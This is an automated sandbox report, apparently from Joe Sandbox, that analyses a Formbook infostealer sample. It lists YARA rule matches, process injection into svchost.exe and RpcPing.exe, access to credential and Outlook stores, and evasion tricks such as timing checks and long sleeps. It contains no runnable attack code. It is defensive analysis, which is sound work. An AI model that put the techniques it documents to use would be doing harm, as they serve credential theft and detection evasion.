            Source: 00000006.00000002.3367695283.0000000004CE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.3356645004.00000000004D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1804925513.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.3365351743.00000000009E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1809587289.00000000056F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.3360236201.0000000000880000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1808701497.0000000003590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.3365349150.0000000002A00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@16/6
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeCode function: 0_2_0044AF6C GetLastError,FormatMessageW,0_2_0044AF6C
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeCode function: 0_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,0_2_00464EAE
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeCode function: 0_2_0045D619 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,0_2_0045D619
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeCode function: 0_2_004755C4 CreateToolhelp32Snapshot,Process32FirstW,__wsplitpath,_wcscat,__wcsicoll,Process32NextW,CloseHandle,0_2_004755C4
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeCode function: 0_2_0046CB5F OleInitialize,CLSIDFromProgID,CLSIDFromString,CoCreateInstance,CoInitializeSecurity,_wcslen,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,0_2_0046CB5F
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeCode function: 0_2_0043305F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,0_2_0043305F
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeFile created: C:\Users\user\AppData\Local\Temp\brawlysJump to behavior
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeCommand line argument: Wu0_2_0040D6B0
            Source: xBzBOQwywT.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: RpcPing.exe, 00000005.00000002.3361983815.00000000009A6000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000002.3361983815.0000000000977000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000003.1989919315.0000000000977000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000002.3361983815.0000000000982000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: xBzBOQwywT.exeReversingLabs: Detection: 71%
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeFile read: C:\Users\user\Desktop\xBzBOQwywT.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\xBzBOQwywT.exe "C:\Users\user\Desktop\xBzBOQwywT.exe"
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\xBzBOQwywT.exe"
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exeProcess created: C:\Windows\SysWOW64\RpcPing.exe "C:\Windows\SysWOW64\RpcPing.exe"
            Source: C:\Windows\SysWOW64\RpcPing.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\xBzBOQwywT.exe"Jump to behavior
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exeProcess created: C:\Windows\SysWOW64\RpcPing.exe "C:\Windows\SysWOW64\RpcPing.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeSection loaded: msdart.dllJump to behavior
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: credui.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\RpcPing.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: xBzBOQwywT.exeStatic file information: File size 1332289 > 1048576
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: IpIaYUETnYWFH.exe, 00000004.00000000.1729593052.0000000000A0E000.00000002.00000001.01000000.00000005.sdmp, IpIaYUETnYWFH.exe, 00000006.00000002.3364160593.0000000000A0E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: xBzBOQwywT.exe, 00000000.00000003.1592526943.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, xBzBOQwywT.exe, 00000000.00000003.1591484081.0000000004740000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1806399364.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1715532753.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1806399364.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1713483766.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000002.3365897202.0000000002F50000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000003.1810471522.0000000000B94000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000002.3365897202.00000000030EE000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000003.1804899051.00000000009E7000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: RPCPing.pdbGCTL source: svchost.exe, 00000002.00000003.1772438382.0000000002C2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1772421164.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, IpIaYUETnYWFH.exe, 00000004.00000003.2058526696.0000000000C5B000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: xBzBOQwywT.exe, 00000000.00000003.1592526943.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, xBzBOQwywT.exe, 00000000.00000003.1591484081.0000000004740000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.1806399364.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1715532753.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1806399364.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1713483766.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, RpcPing.exe, 00000005.00000002.3365897202.0000000002F50000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000003.1810471522.0000000000B94000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000002.3365897202.00000000030EE000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000003.1804899051.00000000009E7000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: RPCPing.pdb source: svchost.exe, 00000002.00000003.1772438382.0000000002C2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1772421164.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, IpIaYUETnYWFH.exe, 00000004.00000003.2058526696.0000000000C5B000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: RpcPing.exe, 00000005.00000002.3367266886.000000000357C000.00000004.10000000.00040000.00000000.sdmp, RpcPing.exe, 00000005.00000002.3361983815.00000000008F2000.00000004.00000020.00020000.00000000.sdmp, IpIaYUETnYWFH.exe, 00000006.00000000.1874660765.00000000028AC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2101667197.000000002D4CC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: RpcPing.exe, 00000005.00000002.3367266886.000000000357C000.00000004.10000000.00040000.00000000.sdmp, RpcPing.exe, 00000005.00000002.3361983815.00000000008F2000.00000004.00000020.00020000.00000000.sdmp, IpIaYUETnYWFH.exe, 00000006.00000000.1874660765.00000000028AC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2101667197.000000002D4CC000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
            Source: xBzBOQwywT.exeStatic PE information: real checksum: 0xa961f should be: 0x14a986
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeCode function: 0_2_00416CB5 push ecx; ret 0_2_00416CC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041206B push ebx; ret 2_2_00412074
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402011 push edx; iretd 2_2_00402032
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00407116 push esi; retf 2_2_00407117
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A9D8 push ebp; retf 2_2_0041A9D9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00403210 push eax; ret 2_2_00403212
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00404334 push ebx; ret 2_2_00404335
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004143D7 pushfd ; ret 2_2_004143D8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401BBB pushad ; retf 2_2_00401BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A45F push esp; ret 2_2_0041A502
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A463 push esp; ret 2_2_0041A502
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041640E push edi; iretd 2_2_00416429
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A503 push esp; ret 2_2_0041A502
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401DE7 push ds; ret 2_2_00401DF3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00411594 push es; ret 2_2_00411596
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00404E13 push edx; ret 2_2_00404E14
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00406690 push esp; iretd 2_2_00406691
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040A69A push ss; retf 2_2_0040A6A1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00411739 push edx; ret 2_2_0041173A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401FC2 push eax; retf 2_2_00401FC5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00404FC3 push esp; iretd 2_2_00404FC4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0320225F pushad ; ret 2_2_032027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032027FA pushad ; ret 2_2_032027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032309AD push ecx; mov dword ptr [esp], ecx2_2_032309B6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0320283D push eax; iretd 2_2_03202858
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0320135E push eax; iretd 2_2_03201369
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exeCode function: 4_2_02C462F7 push ebx; ret 4_2_02C46300
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exeCode function: 4_2_02C3924F push esp; iretd 4_2_02C39250
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exeCode function: 4_2_02C3B3A2 push esi; retf 4_2_02C3B3A3
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exeCode function: 4_2_02C488CF pushad ; retf B253h4_2_02C48918
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exeCode function: 4_2_02C3909F push edx; ret 4_2_02C390A0
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeCode function: 0_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_0047A330
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeAPI/Special instruction interceptor: Address: 3EC1684
            Source: C:\Windows\SysWOW64\RpcPing.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD324
            Source: C:\Windows\SysWOW64\RpcPing.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD7E4
            Source: C:\Windows\SysWOW64\RpcPing.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD944
            Source: C:\Windows\SysWOW64\RpcPing.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD504
            Source: C:\Windows\SysWOW64\RpcPing.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD544
            Source: C:\Windows\SysWOW64\RpcPing.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD1E4
            Source: C:\Windows\SysWOW64\RpcPing.exeAPI/Special instruction interceptor: Address: 7FFBCB7B0154
            Source: C:\Windows\SysWOW64\RpcPing.exeAPI/Special instruction interceptor: Address: 7FFBCB7ADA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0327096E rdtsc 2_2_0327096E
            Source: C:\Windows\SysWOW64\RpcPing.exeWindow / User API: threadDelayed 9756Jump to behavior
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-87679
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeAPI coverage: 3.7 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\RpcPing.exeAPI coverage: 2.8 %
            Source: C:\Windows\SysWOW64\RpcPing.exe TID: 4128Thread sleep count: 217 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exe TID: 4128Thread sleep time: -434000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exe TID: 4128Thread sleep count: 9756 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exe TID: 4128Thread sleep time: -19512000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe TID: 4300Thread sleep time: -55000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe TID: 4300Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\RpcPing.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeCode function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
